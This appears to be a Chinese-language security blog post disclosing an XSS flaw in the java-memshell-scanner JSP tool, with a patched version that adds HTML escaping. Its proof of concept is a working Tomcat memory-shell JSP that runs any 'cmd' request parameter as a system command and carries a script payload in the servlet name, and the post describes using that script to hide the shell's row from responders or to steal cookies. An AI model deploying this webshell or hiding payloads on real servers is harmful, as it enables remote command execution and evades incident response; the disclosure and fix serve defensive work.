java-memshell-scanner xss

2025-11-17

说是研究的东西要落地，内存马落地可以写个jsp内存马查杀工具。我寻思先找几个现成的学习学习，然后看见了这个https://github.com/c0ny1/java-memshell-scanner

这个项目是写了个jsp查杀内存马，但是没有防xss，看了几个PR的Fork也都没防xss

poc

假设我是攻击者，我可以传这么个jsp上去：

<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.catalina.Wrapper" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.util.Scanner" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>

<%
    ServletContext context1 = pageContext.getServletContext();
    System.out.println(context1.getClass().getName());

    Field field1 = context1.getClass().getDeclaredField("context");
    field1.setAccessible(true);
    ApplicationContext context2 = (ApplicationContext) field1.get(context1);
    System.out.println(context2.getClass().getName());

    Field field2 = context2.getClass().getDeclaredField("context");
    field2.setAccessible(true);
    StandardContext context = (StandardContext) field2.get(context2);
    System.out.println(context.getClass().getName());
%>

<%!

    public class Ma implements Servlet {
        @Override
        public void init(ServletConfig config) throws ServletException {
        }

        @Override
        public ServletConfig getServletConfig() {
            return null;
        }

        @Override
        public void service(ServletRequest req, ServletResponse res) throws ServletException, IOException {
            String cmd = req.getParameter("cmd");
            if (cmd != null) {
                InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
                Scanner s = new Scanner(in).useDelimiter("\\a");
                String output = s.hasNext() ? s.next() : "";
                res.getWriter().println(output);
            }
        }

        @Override
        public String getServletInfo() {
            return null;
        }

        @Override
        public void destroy() {
        }
    }
%>
<%
    Ma ma = new Ma();
//    String servletName = ma.getClass().getSimpleName();
    String servletName = "<script>alert()</script>";
    Wrapper wrapper = context.createWrapper();
    wrapper.setName(servletName);
    wrapper.setServlet(ma);
    wrapper.setRunAs(null);
    wrapper.setServletClass(ma.getClass().getName());
    wrapper.setOverridable(false);
    context.addChild(wrapper);
    context.addServletMappingDecoded("/ma", servletName);
%>

servletName里放xss的payload，访问一下这个jsp把内存马插进去，然后用tomcat-memshell-killer.jsp查看：

可以看到html标签被解析了：

exp

真实利用可以写<script>document.currentScript.parentElement.parentElement.remove();</script>执行的时候直接把这一行删了，这样不仔细看就看不出来少了内存马那一行，只有id不对劲。当然js肯定也能改掉id，我就不细写了。

或者就跟其他xss一样拿cookie啥的，用jsp排查内存马这个jsp肯定和内存马在一个网站上，如果他登录了网站就能拿到这个网站的cookie或者token啥的。排查内存马的人不是网站管理员就是安全人员，登过这个网站的概率还是挺大的。

虽然但是内存马都打上去了，再拿个账号用处也不大。

做钓鱼的话也很难，来排查内存马的人不太可能中钓鱼。

beef上线扫内网也不太现实，排查内存马不太可能在这个网页停太长时间，查不出来直接换工具了。

修复

加个html实体编码就完了

夏戟把改的，看看就行。不如直接f12->设置->禁用javascript省事

<%@ page import="java.net.URL" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="java.util.HashMap" %>
<%@ page import="com.sun.org.apache.bcel.internal.Repository" %>
<%@ page import="java.net.URLEncoder" %>
<%@ page import="java.util.Map" %>
<%@ page import="org.apache.catalina.core.StandardWrapper" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.util.ArrayList" %>
<%@ page import="java.util.List" %>
<%@ page import="java.util.concurrent.CopyOnWriteArrayList" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="org.apache.catalina.Pipeline" %>
<%@ page import="org.apache.catalina.valves.ValveBase" %>
<%@ page import="org.apache.catalina.Valve" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>tomcat-memshell-killer</title>
</head>
<body>
<center>
    <div>
        <%!
            public static String escapeHtml(String input) {
                if (input == null) return null;
                return input.replace("&", "&amp;")
                        .replace("<", "&lt;")
                        .replace(">", "&gt;")
                        .replace("\"", "&quot;")
                        .replace("'", "&#x27;");
            }
            public static String unescapeHtml(String input) {
                if (input == null) return null;
                return input.replace("&lt;", "<")
                        .replace("&gt;", ">")
                        .replace("&quot;", "\"")
                        .replace("&#x27;", "'")
                        .replace("&amp;", "&");
            }
            public Object getStandardContext(HttpServletRequest request) throws NoSuchFieldException, IllegalAccessException {
                Object context = request.getSession().getServletContext();
                Field _context = context.getClass().getDeclaredField("context");
                _context.setAccessible(true);
                Object appContext = _context.get(context);
                Field __context = appContext.getClass().getDeclaredField("context");
                __context.setAccessible(true);
                Object standardContext = __context.get(appContext);
                return standardContext;
            }

            public HashMap<String, Object> getFilterConfig(HttpServletRequest request) throws Exception {
                Object standardContext = getStandardContext(request);
                Field _filterConfigs = standardContext.getClass().getDeclaredField("filterConfigs");
                _filterConfigs.setAccessible(true);
                HashMap<String, Object> filterConfigs = (HashMap<String, Object>) _filterConfigs.get(standardContext);
                return filterConfigs;
            }

            // FilterMap[]
            public Object[] getFilterMaps(HttpServletRequest request) throws Exception {
                Object standardContext = getStandardContext(request);
                Field _filterMaps = standardContext.getClass().getDeclaredField("filterMaps");
                _filterMaps.setAccessible(true);
                Object filterMaps = _filterMaps.get(standardContext);

                Object[] filterArray = null;
                try { // tomcat 789
                    Field _array = filterMaps.getClass().getDeclaredField("array");
                    _array.setAccessible(true);
                    filterArray = (Object[]) _array.get(filterMaps);
                } catch (Exception e) { // tomcat 6
                    filterArray = (Object[]) filterMaps;
                }

                return filterArray;
            }

            /**
             * 遗留问题,getFilterConfig()依然存在2个
             * @param request
             * @param filterName
             * @throws Exception
             */
            public synchronized void deleteFilter(HttpServletRequest request, String filterName) throws Exception {
                Object standardContext = getStandardContext(request);
                // org.apache.catalina.core.StandardContext#removeFilterDef
                HashMap<String, Object> filterConfig = getFilterConfig(request);
                Object appFilterConfig = filterConfig.get(filterName);
                Field _filterDef = appFilterConfig.getClass().getDeclaredField("filterDef");
                _filterDef.setAccessible(true);
                Object filterDef = _filterDef.get(appFilterConfig);
                Class clsFilterDef = null;
                try {
                    // Tomcat 8
                    clsFilterDef = Class.forName("org.apache.tomcat.util.descriptor.web.FilterDef");
                } catch (Exception e) {
                    // Tomcat 7
                    clsFilterDef = Class.forName("org.apache.catalina.deploy.FilterDef");
                }
                Method removeFilterDef = standardContext.getClass().getDeclaredMethod("removeFilterDef", new Class[]{clsFilterDef});
                removeFilterDef.setAccessible(true);
                removeFilterDef.invoke(standardContext, filterDef);

                // org.apache.catalina.core.StandardContext#removeFilterMap
                Class clsFilterMap = null;
                try {
                    // Tomcat 8
                    clsFilterMap = Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap");
                } catch (Exception e) {
                    // Tomcat 7
                    clsFilterMap = Class.forName("org.apache.catalina.deploy.FilterMap");
                }
                Object[] filterMaps = getFilterMaps(request);
                for (Object filterMap : filterMaps) {
                    Field _filterName = filterMap.getClass().getDeclaredField("filterName");
                    _filterName.setAccessible(true);
                    String filterName0 = (String) _filterName.get(filterMap);
                    if (filterName0.equals(filterName)) {
                        Method removeFilterMap = standardContext.getClass().getDeclaredMethod("removeFilterMap", new Class[]{clsFilterMap});
                        removeFilterDef.setAccessible(true);
                        removeFilterMap.invoke(standardContext, filterMap);
                    }
                }
            }

            public synchronized void deleteServlet(HttpServletRequest request, String servletName) throws Exception {
                HashMap<String, Object> childs = getChildren(request);
                Object objChild = childs.get(servletName);
                String urlPattern = null;
                HashMap<String, String> servletMaps = getServletMaps(request);
                for (Map.Entry<String, String> servletMap : servletMaps.entrySet()) {
                    if (servletMap.getValue().equals(servletName)) {
                        urlPattern = servletMap.getKey();
                        break;
                    }
                }

                if (urlPattern != null) {
                    // 反射调用 org.apache.catalina.core.StandardContext#removeServletMapping
                    Object standardContext = getStandardContext(request);
                    Method removeServletMapping = standardContext.getClass().getDeclaredMethod("removeServletMapping", new Class[]{String.class});
                    removeServletMapping.setAccessible(true);
                    removeServletMapping.invoke(standardContext, urlPattern);
                    // Tomcat 6必须removeChild 789可以不用
                    // 反射调用 org.apache.catalina.core.StandardContext#removeChild
                    Method removeChild = standardContext.getClass().getDeclaredMethod("removeChild", new Class[]{org.apache.catalina.Container.class});
                    removeChild.setAccessible(true);
                    removeChild.invoke(standardContext, objChild);
                }
            }

            public synchronized void deleteValve(HttpServletRequest request, String valveName) throws Exception {
                StandardContext standardContext = (StandardContext) getStandardContext(request);
                Valve[] valves = standardContext.getPipeline().getValves();
                for (Valve valve : valves) {
                    if(valve.getClass().getName().equals(valveName)){
                        standardContext.getPipeline().removeValve(valve);
                        break;
                    }
                }
            }

            public synchronized HashMap<String, Object> getChildren(HttpServletRequest request) throws Exception {
                Object standardContext = getStandardContext(request);
                Field _children = standardContext.getClass().getSuperclass().getDeclaredField("children");
                _children.setAccessible(true);
                HashMap<String, Object> children = (HashMap<String, Object>) _children.get(standardContext);
                return children;
            }


            public synchronized HashMap<String, String> getServletMaps(HttpServletRequest request) throws Exception {
                Object standardContext = getStandardContext(request);
                Field _servletMappings = standardContext.getClass().getDeclaredField("servletMappings");
                _servletMappings.setAccessible(true);
                HashMap<String, String> servletMappings = (HashMap<String, String>) _servletMappings.get(standardContext);
                return servletMappings;
            }

            public synchronized List<Object> getListenerList(HttpServletRequest request) throws Exception {
                Object standardContext = getStandardContext(request);
                Field _listenersList = standardContext.getClass().getDeclaredField("applicationEventListenersList");
                _listenersList.setAccessible(true);
                List<Object> listenerList = (CopyOnWriteArrayList) _listenersList.get(standardContext);
                return listenerList;
            }

            public synchronized List<Object> getValveList(HttpServletRequest request) throws Exception {
                StandardContext standardContext = (StandardContext) getStandardContext(request);
                return List.of(standardContext.getPipeline().getValves());
            }

            public String getFilterName(Object filterMap) throws Exception {
                Method getFilterName = filterMap.getClass().getDeclaredMethod("getFilterName");
                getFilterName.setAccessible(true);
                return (String) getFilterName.invoke(filterMap, null);
            }

            public String[] getURLPatterns(Object filterMap) throws Exception {
                Method getFilterName = filterMap.getClass().getDeclaredMethod("getURLPatterns");
                getFilterName.setAccessible(true);
                return (String[]) getFilterName.invoke(filterMap, null);
            }


            String classFileIsExists(Class clazz) {
                if (clazz == null) {
                    return "class is null";
                }

                String className = clazz.getName();
                String classNamePath = className.replace(".", "/") + ".class";
                URL is = clazz.getClassLoader().getResource(classNamePath);
                if (is == null) {
                    return "<span style='color: red'>在磁盘上没有对应class文件，可能是内存马</span>";
                } else if (is.getPath().contains("jsp$")) {
                    return "<span style='color: red'>jsp的内部类，疑似内存马:</span>"+escapeHtml(is.getPath());
                } else {
                    return escapeHtml(is.getPath());
                }
            }

            String arrayToString(String[] str) {
                String res = "[";
                for (String s : str) {
                    res += String.format("%s,", s);
                }
                res = res.substring(0, res.length() - 1);
                res += "]";
                return res;
            }
        %>

        <%
            out.write("<h2>Tomcat memshell scanner 0.1.0</h2>");
            String action = request.getParameter("action");
            String filterName = request.getParameter("filterName");
            String servletName = request.getParameter("servletName");
            String valveClass = request.getParameter("valveClass");
            String className = request.getParameter("className");
            if (action != null && action.equals("kill") && filterName != null) {
                deleteFilter(request, unescapeHtml(filterName));
            } else if (action != null && action.equals("kill") && servletName != null) {
                deleteServlet(request, unescapeHtml(servletName));
            } else if (action != null && action.equals("kill") && valveClass != null) {
                deleteValve(request, unescapeHtml(valveClass));
            } else if (action != null && action.equals("dump") && className != null) {
                byte[] classBytes = Repository.lookupClass(Class.forName(unescapeHtml(className))).getBytes();
                response.addHeader("content-Type", "application/octet-stream");
                String filename = Class.forName(unescapeHtml(className)).getSimpleName() + ".class";

                String agent = request.getHeader("User-Agent");
                if (agent.toLowerCase().indexOf("chrome") > 0) {
                    response.addHeader("content-Disposition", "attachment;filename=" + new String(filename.getBytes("UTF-8"), "ISO8859-1"));
                } else {
                    response.addHeader("content-Disposition", "attachment;filename=" + URLEncoder.encode(filename, "UTF-8"));
                }
                ServletOutputStream outDumper = response.getOutputStream();
                outDumper.write(classBytes, 0, classBytes.length);
                outDumper.close();
            } else {
                // Scan filter
                out.write("<h4>Filter scan result</h4>");
                out.write("<table border=\"1\" cellspacing=\"0\" width=\"95%\" style=\"table-layout:fixed;word-break:break-all;background:#f2f2f2\">\n" +
                        "    <thead>\n" +
                        "        <th width=\"5%\">ID</th>\n" +
                        "        <th width=\"10%\">Filter name</th>\n" +
                        "        <th width=\"10%\">Patern</th>\n" +
                        "        <th width=\"20%\">Filter class</th>\n" +
                        "        <th width=\"20%\">Filter classLoader</th>\n" +
                        "        <th width=\"25%\">Filter class file path</th>\n" +
                        "        <th width=\"5%\">dump class</th>\n" +
                        "        <th width=\"5%\">kill</th>\n" +
                        "    </thead>\n" +
                        "    <tbody>");

                HashMap<String, Object> filterConfigs = getFilterConfig(request);
                Object[] filterMaps1 = getFilterMaps(request);
                for (int i = 0; i < filterMaps1.length; i++) {
                    out.write("<tr>");
                    Object fm = filterMaps1[i];
                    Object appFilterConfig = filterConfigs.get(getFilterName(fm));
                    if (appFilterConfig == null) {
                        continue;
                    }
                    Field _filter = appFilterConfig.getClass().getDeclaredField("filter");
                    _filter.setAccessible(true);
                    Object filter = _filter.get(appFilterConfig);
                    String filterClassName = filter.getClass().getName();
                    String filterClassLoaderName = filter.getClass().getClassLoader().getClass().getName();
                    // ID Filtername 匹配路径 className classLoader 是否存在file dump kill
                    try {
                        out.write(String.format("<td style=\"text-align:center\">%d</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td style=\"text-align:center\"><a href=\"?action=dump&className=%s\">dump</a></td><td style=\"text-align:center\"><a href=\"?action=kill&filterName=%s\">kill</a></td>"
                                , i + 1
                                , escapeHtml(getFilterName(fm))
                                , escapeHtml(arrayToString(getURLPatterns(fm)))
                                , escapeHtml(filterClassName)
                                , escapeHtml(filterClassLoaderName)
                                , classFileIsExists(filter.getClass())// 内部已编码
                                , escapeHtml(filterClassName)
                                , escapeHtml(getFilterName(fm))));
                    } catch (Exception e) {
                        throw new RuntimeException(e);
                    }
                    out.write("</tr>");
                }
                out.write("</tbody></table>");

                // Scan servlet
                out.write("<h4>Servlet scan result</h4>");
                out.write("<table border=\"1\" cellspacing=\"0\" width=\"95%\" style=\"table-layout:fixed;word-break:break-all;background:#f2f2f2\">\n" +
                        "    <thead>\n" +
                        "        <th width=\"5%\">ID</th>\n" +
                        "        <th width=\"10%\">Servlet name</th>\n" +
                        "        <th width=\"10%\">Patern</th>\n" +
                        "        <th width=\"20%\">Servlet class</th>\n" +
                        "        <th width=\"20%\">Servlet classLoader</th>\n" +
                        "        <th width=\"25%\">Servlet class file path</th>\n" +
                        "        <th width=\"5%\">dump class</th>\n" +
                        "        <th width=\"5%\">kill</th>\n" +
                        "    </thead>\n" +
                        "    <tbody>");

                HashMap<String, Object> children = getChildren(request);
                Map<String, String> servletMappings = getServletMaps(request);

                int servletId = 0;
                for (Map.Entry<String, String> map : servletMappings.entrySet()) {
                    String servletMapPath = map.getKey();
                    String servletName1 = map.getValue();
                    StandardWrapper wrapper = (StandardWrapper) children.get(servletName1);

                    Class servletClass = null;
                    try {
                        servletClass = Class.forName(wrapper.getServletClass());
                    } catch (Exception e) {
                        Object servlet = wrapper.getServlet();
                        if (servlet != null) {
                            servletClass = servlet.getClass();
                        }
                    }
                    if (servletClass != null) {
                        out.write("<tr>");
                        String servletClassName = servletClass.getName();
                        String servletClassLoaderName = null;
                        try {
                            servletClassLoaderName = servletClass.getClassLoader().getClass().getName();
                        } catch (Exception e) {
                        }
                        out.write(String.format("<td style=\"text-align:center\">%d</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td style=\"text-align:center\"><a href=\"?action=dump&className=%s\">dump</a></td><td style=\"text-align:center\"><a href=\"?action=kill&servletName=%s\">kill</a></td>"
                                , servletId + 1
                                , escapeHtml(servletName1)
                                , escapeHtml(servletMapPath)
                                , escapeHtml(servletClassName)
                                , escapeHtml(servletClassLoaderName)
                                , classFileIsExists(servletClass)// 内部已编码
                                , escapeHtml(servletClassName)
                                , escapeHtml(servletName1)));
                        out.write("</tr>");
                    }
                    servletId++;
                }
                out.write("</tbody></table>");

                List<Object> listeners = getListenerList(request);
                if (!(listeners == null || listeners.size() == 0)) {
                    out.write("<tbody>");
                    List<ServletRequestListener> newListeners = new ArrayList<>();
                    for (Object o : listeners) {
                        if (o instanceof ServletRequestListener) {
                            newListeners.add((ServletRequestListener) o);
                        }
                    }

                    // Scan listener
                    out.write("<h4>Listener scan result</h4>");
                    out.write("<table border=\"1\" cellspacing=\"0\" width=\"95%\" style=\"table-layout:fixed;word-break:break-all;background:#f2f2f2\">\n" +
                            "    <thead>\n" +
                            "        <th width=\"5%\">ID</th>\n" +
                            "        <th width=\"20%\">Listener class</th>\n" +
                            "        <th width=\"30%\">Listener classLoader</th>\n" +
                            "        <th width=\"35%\">Listener class file path</th>\n" +
                            "        <th width=\"5%\">dump class</th>\n" +
                            "        <th width=\"5%\">kill</th>\n" +
                            "    </thead>\n" +
                            "    <tbody>");

                    int index = 0;
                    for (ServletRequestListener listener : newListeners) {
                        out.write("<tr>");
                        out.write(String.format("<td style=\"text-align:center\">%d</td><td>%s</td><td>%s</td><td>%s</td><td style=\"text-align:center\"><a href=\"?action=dump&className=%s\">dump</a></td><td style=\"text-align:center\"><a href=\"?action=kill&servletName=%s\">kill</a></td>"
                                , index + 1
                                , escapeHtml(listener.getClass().getName())
                                , escapeHtml(String.valueOf(listener.getClass().getClassLoader()))
                                , classFileIsExists(listener.getClass())// 内部已编码
                                , escapeHtml(listener.getClass().getName())
                                , escapeHtml(listener.getClass().getName())));
                        out.write("</tr>");
                        index++;
                    }
                    out.write("</tbody></table>");
                }
                List<Object> valves = getValveList(request);
                if (!(valves == null || valves.size() == 0)) {
                    out.write("<tbody>");
                    List<ValveBase> newValves = new ArrayList<>();
                    for (Object o : valves) {
                        if (o instanceof ValveBase) {
                            newValves.add((ValveBase) o);
                        }
                    }

                    // Scan valve
                    out.write("<h4>Valve scan result</h4>");
                    out.write("<table border=\"1\" cellspacing=\"0\" width=\"95%\" style=\"table-layout:fixed;word-break:break-all;background:#f2f2f2\">\n" +
                            "    <thead>\n" +
                            "        <th width=\"5%\">ID</th>\n" +
                            "        <th width=\"20%\">Valve class</th>\n" +
                            "        <th width=\"30%\">Valve classLoader</th>\n" +
                            "        <th width=\"35%\">Valve class file path</th>\n" +
                            "        <th width=\"5%\">dump class</th>\n" +
                            "        <th width=\"5%\">kill</th>\n" +
                            "    </thead>\n" +
                            "    <tbody>");

                    int index = 0;
                    for (ValveBase valve : newValves) {
                        out.write("<tr>");
                        out.write(String.format("<td style=\"text-align:center\">%d</td><td>%s</td><td>%s</td><td>%s</td><td style=\"text-align:center\"><a href=\"?action=dump&className=%s\">dump</a></td><td style=\"text-align:center\"><a href=\"?action=kill&valveClass=%s\">kill</a></td>"
                                , index + 1
                                , escapeHtml(valve.getClass().getName())
                                , escapeHtml(String.valueOf(valve.getClass().getClassLoader()))
                                , classFileIsExists(valve.getClass())// 内部已编码
                                , escapeHtml(valve.getClass().getName())
                                , escapeHtml(valve.getClass().getName())));
                        out.write("</tr>");
                        index++;
                    }
                    out.write("</tbody></table>");
                }
            }
        %>
    </div>
    <br/>
    code by c0ny1
</center>
</body>
</html>